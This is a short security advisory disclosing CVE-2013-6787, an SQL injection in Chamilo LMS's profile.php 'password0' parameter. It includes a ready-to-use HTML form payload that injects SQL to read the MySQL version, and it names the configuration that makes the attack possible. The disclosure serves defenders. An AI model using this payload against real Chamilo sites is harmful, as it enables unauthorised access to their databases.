SQL Injection in Chamilo LMS

High-Tech Bridge Security Research Lab discovered vulnerability in Chamilo LMS, which can be exploited to perform SQL Injection attacks.

1. SQL Injection in Chamilo LMS: CVE-2013-6787
   The vulnerability exists due to insufficient validation of “password0” HTTP POST parameter passed to “/main/auth/profile.php” script. A remote authenticated attacker can execute arbitrary SQL commands in application’s database.
   The following exploitation example displays version of MySQL server:
   <form action=“http://[host]/main/auth/profile.php” method=“post” name=“main”>
   <input type=“hidden” name=“password0” value=“’ OR substring(version(),1,1)=5 – “>
   <input type=“hidden” name=“password1” value=“password”>
   <input type=“hidden” name=“password2” value=“password”>
   <input type=“hidden” name=“apply_change” value=””>
   <input type=“hidden” name=“firstname” value=“first_name”>
   <input type=“hidden” name=“lastname” value=“last_name”>
   <input type=“hidden” name=“username” value=“username”>
   <input type=“hidden” name=“official_code” value=“USER”>
   <input type=“hidden” name=“phone” value=“”>
   <input type=“hidden” name=“language” value=“”>
   <input type=“hidden” name=“extra_mail_notify_invitation” value=“”>
   <input type=“hidden” name=“extra_mail_notify_message” value=“”>
   <input type=“hidden” name=“extra_mail_notify_group_message” value=“”>
   <input type=“hidden” name=“_qf__profile” value=“”>
   <input type=“hidden” name=“” value=“”>
   <input type=“submit” id=“btn”>
   </form>
   Successful exploitation of this vulnerability requires that the application is configured during installation not to encrypt users’ passwords (“Encryption method” option is set to “none”).